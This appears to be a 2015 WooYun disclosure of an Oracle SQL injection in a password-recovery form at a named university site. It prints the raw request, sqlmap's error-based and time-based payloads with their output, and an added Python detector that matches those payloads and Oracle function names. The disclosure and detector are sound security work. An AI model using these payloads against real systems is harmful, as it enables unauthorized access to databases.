Vulnerability summary

Defect ID: wooyun-2015-0152509

Title: Oracle error-based SQL injection at an East China Normal University site

Vendor: East China Normal University

Author: 路人甲

Submitted: 2015-11-08 19:46

Fixed: 2015-12-25 08:22

Published: 2015-12-25 08:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure timeline:

2015-11-08: Details sent to the vendor, awaiting vendor handling
2015-11-10: Vendor confirmed; details visible to the vendor only
2015-11-20: Details opened to core white hats and domain experts
2015-11-30: Details opened to regular white hats
2015-12-10: Details opened to intern white hats
2015-12-25: Details opened to the public

Brief description:

Detailed description:

POST /sggl/wsjj/mmzh.jsp HTTP/1.1
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
Referer: http://jingjia.ecnu.edu.cn
Cookie: JSESSIONID=CFCB2542C85EB9F5DB8A9BEFCAFA1BDB
Host: jingjia.ecnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
email=1&xm=1

[Screenshots: 21.png, 22.png]

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: email=1' AND 8844=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(118)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8844=8844) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(106)||CHR(118)||CHR(113)) AND 'OJmn'='OJmn&xm=1
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: email=1' AND 2558=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(106)||CHR(104)||CHR(108),5) AND 'mcWd'='mcWd&xm=1
---
back-end DBMS: Oracle
Database: ZC
[317 tables]

Proof of vulnerability:

Fix recommendation:
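The report leaves this section empty; the root-cause fix is to bind the email and xm form fields as parameters (a PreparedStatement in the JSP) instead of concatenating them into the query. On the detection side, the following Python scanner is an added example, not part of the original report or of the affected system: it replays the two sqlmap payloads shown above through constructed, tab-separated proxy log lines and flags the Oracle functions, CHR() chains and quote-tautology pattern they carry. The log format, client address and timestamps are constructed, and the function list extends the two on this page with UTL_HTTP.REQUEST and CTXSYS.DRITHSX.SN, which fill the same role in other Oracle error-based probes.

```python
"""Flag Oracle error-based / time-based SQL injection probes in form POST bodies.

Added example for this report; log format and sample lines are constructed,
the two injected bodies are the sqlmap payloads from the report itself.
"""
import re
from urllib.parse import parse_qs

# Oracle packages that error-based and time-based injection leans on;
# none of them belongs in a login or password-recovery form field.
ORACLE_FUNCS = re.compile(
    r"\b(UTL_INADDR\.GET_HOST_ADDRESS|DBMS_PIPE\.RECEIVE_MESSAGE|"
    r"UTL_HTTP\.REQUEST|CTXSYS\.DRITHSX\.SN)\b", re.IGNORECASE)
# CHR(n)||CHR(n) chains build marker strings without using quote characters.
CHR_CHAIN = re.compile(r"CHR\(\d+\)\s*\|\|\s*CHR\(\d+\)", re.IGNORECASE)
# AND 'abcd'='abcd with the final quote left for the original query to close.
QUOTE_TAUTOLOGY = re.compile(r"\b(AND|OR)\s+'(\w+)'\s*=\s*'\2(?!\w)", re.IGNORECASE)

def classify_body(body: str) -> dict:
    """Return {field: [reasons]} for every form field that looks injected."""
    findings = {}
    # parse_qs also percent-decodes, so an encoded body from a proxy log works too.
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            reasons = []
            if ORACLE_FUNCS.search(value):
                reasons.append("oracle-function")
            if CHR_CHAIN.search(value):
                reasons.append("chr-chain")
            if QUOTE_TAUTOLOGY.search(value):
                reasons.append("quote-tautology")
            if reasons:
                findings.setdefault(field, []).extend(reasons)
    return findings

def scan_log(lines):
    """Return (timestamp, client, path, findings) for each POST carrying a probe."""
    alerts = []
    for line in lines:
        ts, client, method, path, body = line.rstrip("\n").split("\t", 4)
        if method == "POST" and (findings := classify_body(body)):
            alerts.append((ts, client, path, findings))
    return alerts

# Constructed log lines: timestamp, client (RFC 5737 address), method, path, body.
LOG_LINES = [
    "2015-11-08T19:46:01\t198.51.100.7\tPOST\t/sggl/wsjj/mmzh.jsp\temail=alice%40example.edu&xm=Alice",
    "2015-11-08T19:46:02\t198.51.100.7\tPOST\t/sggl/wsjj/mmzh.jsp\temail=1' AND 8844=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(118)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8844=8844) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(106)||CHR(118)||CHR(113)) AND 'OJmn'='OJmn&xm=1",
    "2015-11-08T19:46:03\t198.51.100.7\tPOST\t/sggl/wsjj/mmzh.jsp\temail=1' AND 2558=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(106)||CHR(104)||CHR(108),5) AND 'mcWd'='mcWd&xm=1",
]

if __name__ == "__main__":
    for alert in scan_log(LOG_LINES):
        print(alert)
```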

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-11-10 08:22

Vendor reply:

Notified the responsible second-level unit to handle it.

Latest status:

None yet